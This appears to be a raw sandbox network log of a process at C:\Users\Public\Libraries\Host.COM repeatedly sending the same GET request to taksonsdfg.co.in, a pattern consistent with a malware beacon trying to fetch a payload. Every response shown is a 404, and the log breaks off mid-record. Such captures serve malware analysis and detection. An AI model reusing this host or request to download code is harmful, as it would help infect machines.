User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:54 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:54 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:54 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:54 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50174 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:55 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:55 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:55 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:55 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:55 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50176 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:56 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:56 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:56 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:56 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:56 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50178 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:57 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:58 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:57 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:58 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:58 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50180 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:58 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:30:59 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:30:58 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:30:59 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:30:59 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50182 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:30:59 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:00 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:00 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:00 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:00 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50184 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:00 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:01 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:01 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:01 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:01 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 50186 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:02 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:02 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:02 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:02 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50188 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:03 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:03 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:03 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:03 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:03 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50190 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:04 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:04 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:04 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50192 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:05 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:06 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:05 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:06 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:06 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50194 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:06 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:07 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:07 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:07 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:07 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50196 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:08 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:08 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:08 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:08 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:08 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50198 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:09 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:09 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:09 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:09 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:09 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50200 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:10 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:10 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:10 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:10 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:10 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50202 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:11 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:31:11 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:31:11 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:11 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:11 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50204 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:12 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:12 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:12 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:12 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:12 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 50206 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:13 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:14 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:13 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:14 UTC | 952 | IN
